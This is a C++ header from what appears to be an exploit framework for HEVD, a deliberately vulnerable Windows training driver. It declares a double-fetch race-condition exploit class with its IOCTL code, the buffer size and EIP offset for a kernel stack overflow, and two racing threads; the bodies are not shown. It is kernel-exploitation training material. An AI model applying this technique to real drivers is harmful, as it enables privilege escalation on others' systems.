#pragma once
#include <atomic>
#include <memory>
#include <mutex>
#include <thread>
#include "common.h"
#include "IExploit.h"
#include "HevdConstants.h"
#include "payloads.h"
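/// IExploit implementation for the HEVD "Double Fetch" IOCTL exercise.
///
/// "Double fetch" names the bug class where a kernel handler reads a
/// user-controlled field (here the `size` of DoubleFetch) more than once,
/// leaving a time-of-check/time-of-use window. The two thread entry points
/// declared below (triggerThread / flipThread) presumably split the work of
/// issuing the IOCTL and mutating the shared DoubleFetch record; their bodies
/// and exploit() live in the .cpp and are not visible here — confirm there.
class ExploitDoubleFetch : public IExploit {
    // A string literal is `const wchar_t[]`; binding it to a non-const pointer
    // is ill-formed in standard C++ (accepted only as an MSVC extension).
    static constexpr const wchar_t *Exploit_Name = L"Double Fetch";
    static constexpr DWORD Ioctl_Code = HACKSYS_EVD_IOCTL_DOUBLE_FETCH;
    // This is maximum stack-based buffer size
    static constexpr unsigned int Max_Accepted_Buffer_Size = 0x800;
    // This value will constitute offset of 0x820 (2080) where the EIP is stored counting
    // from the beginning of overflowed buffer, and the additional 0x04 is for stating
    // that the one DWORD should be taken into account during memcpy in kernel.
    static constexpr unsigned int Flip_Difference = 0x24;
    static constexpr size_t Overflowing_Buffer_Size = Max_Accepted_Buffer_Size + Flip_Difference + 4;

    // Backing storage for the IOCTL input buffer.
    // NOTE(review): the default shared_ptr deleter calls `delete`, not
    // `delete[]`; if the allocation site uses `new UCHAR[n]` it must supply an
    // array deleter. The allocation is not visible in this header — verify.
    std::shared_ptr<UCHAR> ioctlInputBuffer;
    // Before C++20 a default-constructed std::atomic_bool holds an
    // indeterminate value, so both flags are initialised explicitly.
    std::atomic_bool startThreads{false};
    std::atomic_bool stopThreads{false};
    // Layout of the IOCTL input as handed to the driver: a user-mode pointer
    // and the length the driver is told to trust.
    struct DoubleFetch {
        UCHAR *buffer;
        DWORD size;
    };
    // Value-initialised in-class, so the constructor needs no memset.
    DoubleFetch flippingObject{};
    // Count of IOCTL requests issued; updated by the thread bodies (not shown).
    DWORD ioctlPackets{0};

public:
    /// Binds this exploit to the driver handle managed by the IExploit base.
    explicit ExploitDoubleFetch(Driver& driver) : IExploit(driver) {}
    virtual ~ExploitDoubleFetch() = default;

    /// Human-readable name shown for this exploit ("Double Fetch").
    const wchar_t* getName() const override {
        return ExploitDoubleFetch::Exploit_Name;
    }
    /// IOCTL code this exploit sends to the driver.
    DWORD getIoctlCode() const override {
        return ExploitDoubleFetch::Ioctl_Code;
    }
    /// Runs the exercise; defined in the .cpp. Returns true on success.
    bool exploit() override;
    /// Thread body that issues the IOCTL requests (defined in the .cpp).
    void triggerThread();
    /// Thread body that mutates the shared DoubleFetch record (defined in the .cpp).
    void flipThread();
};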